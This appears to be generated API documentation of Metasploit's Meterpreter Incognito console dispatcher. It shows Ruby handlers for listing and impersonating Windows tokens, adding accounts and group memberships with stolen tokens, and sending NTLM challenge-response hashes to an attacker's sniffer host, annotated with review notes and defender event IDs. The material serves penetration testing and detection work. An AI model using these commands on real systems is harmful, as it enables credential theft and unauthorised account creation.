class Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Incognito

Privilege escalation extension user interface.

Constants

Klass

Public Class Methods

new(shell)

Initializes an instance of the incognito command interaction.

# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 22
# Builds the dispatcher for the given console shell.
#
# Adds no state of its own: the shell is forwarded unchanged to the parent
# class constructor.
def initialize(shell)
  super(shell)
end

Public Instance Methods

cmd_add_group_user(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 176
# Console handler for the add_group_user command.
#
# Takes <groupname> and <username> from the first two entries of +args+ and
# passes them, with the target host, to
# client.incognito.incognito_add_group_user, echoing the returned text line
# by line. The host is 127.0.0.1 unless -h supplies another value.
#
# Returns nil after printing usage (fewer than two arguments) and true once
# the request has been issued; true does not mean the remote attempt worked.
#
# NOTE(review): the length check and the positional reads use the same array
# that is handed to the option parser, so option tokens count as arguments.
# The usage text lists [options] last, presumably for that reason - confirm
# against the parser.
# Defender note: a successful run changes global group membership on the
# target; Windows records that as event 4728 when account-management
# auditing is enabled.
def cmd_add_group_user(*args)
  # Target defaults to the local machine.
  host = "127.0.0.1"

  @@add_group_user_opts.parse(args) do |opt, _idx, val|
    host = val if opt == "-h"
  end

  unless args.length >= 2
    print_line("Usage: add_group_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_group_user_opts.usage)
    return
  end

  # Only warns when the session is not SYSTEM; it never aborts the command.
  system_privilege_check

  groupname, username = args

  result = client.incognito.incognito_add_group_user(host, groupname, username)
  result.each_line do |line|
    print(line)
  end

  true
end
cmd_add_localgroup_user(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 146
# Console handler for the add_localgroup_user command.
#
# Takes <groupname> and <username> from the first two entries of +args+ and
# passes them, with the target host, to
# client.incognito.incognito_add_localgroup_user, echoing the returned text
# line by line. The host is 127.0.0.1 unless -h supplies another value.
#
# Returns nil after printing usage (fewer than two arguments) and true once
# the request has been issued; true does not mean the remote attempt worked.
#
# NOTE(review): option tokens are counted by the length check and can land in
# args[0]/args[1], because the same array goes to the option parser. The
# usage text lists [options] last - confirm the intended ordering.
# Defender note: a successful run changes local group membership on the
# target; Windows records that as event 4732 when account-management
# auditing is enabled.
def cmd_add_localgroup_user(*args)
  # Target defaults to the local machine.
  host = "127.0.0.1"

  @@add_localgroup_user_opts.parse(args) do |opt, _idx, val|
    host = val if opt == "-h"
  end

  unless args.length >= 2
    print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_localgroup_user_opts.usage)
    return
  end

  # Only warns when the session is not SYSTEM; it never aborts the command.
  system_privilege_check

  groupname, username = args

  result = client.incognito.incognito_add_localgroup_user(host, groupname, username)
  result.each_line do |line|
    print(line)
  end

  true
end
cmd_add_user(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 116
# Console handler for the add_user command.
#
# Takes <username> and <password> from the first two entries of +args+ and
# passes them, with the target host, to client.incognito.incognito_add_user,
# echoing the returned text line by line. The host is 127.0.0.1 unless -h
# supplies another value.
#
# Returns nil after printing usage (fewer than two arguments) and true once
# the request has been issued; true does not mean the remote attempt worked.
#
# NOTE(review): the password is a plain positional argument, so it may end up
# in console history or session logs - confirm how the console records input.
# NOTE(review): option tokens are counted by the length check and can land in
# args[0]/args[1], because the same array goes to the option parser.
# Defender note: a successful run creates an account on the target; Windows
# records that as event 4720 when account-management auditing is enabled.
def cmd_add_user(*args)
  # Target defaults to the local machine.
  host = "127.0.0.1"

  @@add_user_opts.parse(args) do |opt, _idx, val|
    host = val if opt == "-h"
  end

  unless args.length >= 2
    print_line("Usage: add_user <username> <password> [options]\n")
    print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
    print_line(@@add_user_opts.usage)
    return
  end

  # Only warns when the session is not SYSTEM; it never aborts the command.
  system_privilege_check

  username, password = args

  result = client.incognito.incognito_add_user(host, username, password)
  result.each_line do |line|
    print(line)
  end

  true
end
cmd_impersonate_token(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 98
# Console handler for the impersonate_token command.
#
# Passes the first argument (the token name) to
# client.incognito.incognito_impersonate_token and echoes the returned text
# line by line. Any further arguments are ignored.
#
# Returns nil after printing usage (no arguments) and true once the request
# has been issued; true does not mean the impersonation succeeded.
def cmd_impersonate_token(*args)
  if args.empty?
    [
      "Usage: impersonate_token <token>\n",
      "Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n",
      "Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)",
      "Hint: Enclose with quotation marks if name contains a space\n"
    ].each { |usage_line| print_line(usage_line) }
    return
  end

  # Only warns when the session is not SYSTEM; it never aborts the command.
  system_privilege_check

  token_name = args.first
  client.incognito.incognito_impersonate_token(token_name).each_line do |line|
    print(line)
  end

  true
end
cmd_list_tokens(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 54
# Console handler for the list_tokens command.
#
# Requires one of the ordering flags: -u selects order 0 and -g selects
# order 1 (presumably "by user" and "by group" - confirm against the option
# definitions). When both are given, the later one wins. The chosen order is
# passed to client.incognito.incognito_list_tokens, and the 'delegation' and
# 'impersonation' entries of the result are printed under their own
# headings.
#
# Returns nil after printing usage (no ordering flag) and true otherwise.
def cmd_list_tokens(*args)
  # -1 is the sentinel for "no ordering flag seen".
  token_order = -1

  @@list_tokens_opts.parse(args) do |opt, _idx, _val|
    if opt == "-u"
      token_order = 0
    elsif opt == "-g"
      token_order = 1
    end
  end

  if token_order == -1
    print_line("Usage: list_tokens <list_order_option>\n")
    print_line("Lists all accessible tokens and their privilege level")
    print_line(@@list_tokens_opts.usage)
    return
  end

  # Only warns when the session is not SYSTEM; it never aborts the command.
  system_privilege_check

  tokens = client.incognito.incognito_list_tokens(token_order)

  sections = [
    ["Delegation Tokens Available", 'delegation'],
    ["Impersonation Tokens Available", 'impersonation']
  ]

  sections.each do |heading, key|
    print_line()
    print_line(heading)
    print_line("========================================")

    tokens[key].each_line do |line|
      print(line)
    end
  end

  print_line()

  true
end
cmd_snarf_hashes(*args)
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 206
# Console handler for the snarf_hashes command.
#
# Passes the first argument (the sniffer host) to
# client.incognito.incognito_snarf_hashes, printing a status line before and
# after the call. Any further arguments are ignored.
#
# Returns nil after printing usage (no arguments) and true otherwise.
#
# NOTE(review): the value returned by incognito_snarf_hashes is discarded, so
# the "Done" line is printed whenever the call returns and says nothing
# about whether any request was actually made.
def cmd_snarf_hashes(*args)
  if args.empty?
    print_line("Usage: snarf_hashes <sniffer_host>\n")
    print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
    return
  end

  # Only warns when the session is not SYSTEM; it never aborts the command.
  system_privilege_check

  sniffer_host = args.first

  print_line("[*] Snarfing token hashes...")
  client.incognito.incognito_snarf_hashes(sniffer_host)
  print_line("[*] Done. Check sniffer logs")

  true
end
commands()

List of supported commands.

# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 29
# Command table for this dispatcher.
#
# Returns a Hash that maps each console command name to its one-line help
# text. Every key has a matching cmd_<name> method in this class.
def commands
  supported = {
    "add_user"            => "Attempt to add a user with all tokens",
    "add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
    "add_group_user"      => "Attempt to add a user to a global group with all tokens",
    "list_tokens"         => "List tokens available under current user context",
    "impersonate_token"   => "Impersonate specified token",
    "snarf_hashes"        => "Snarf challenge/response hashes for every token"
  }

  supported
end
name()

Name for this dispatcher

# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 232
# Display name of this dispatcher.
#
# Returns the String "Incognito".
def name
  "Incognito"
end
system_privilege_check()
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 222
# Prints a two-line warning when the session is not running as SYSTEM.
#
# Compares client.sys.config.getuid with the literal "NT AUTHORITY\SYSTEM".
# This is advisory only: nothing is raised and the caller carries on either
# way.
#
# NOTE(review): the comparison is an exact, case-sensitive string match on
# the account name, so a differently spelled or localized SYSTEM account
# name would presumably trigger the warning as well - confirm what getuid
# returns on such hosts.
def system_privilege_check
  current_uid = client.sys.config.getuid
  return if current_uid == "NT AUTHORITY\\SYSTEM"

  print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
  print_line("             Call rev2self if primary process token is SYSTEM")
end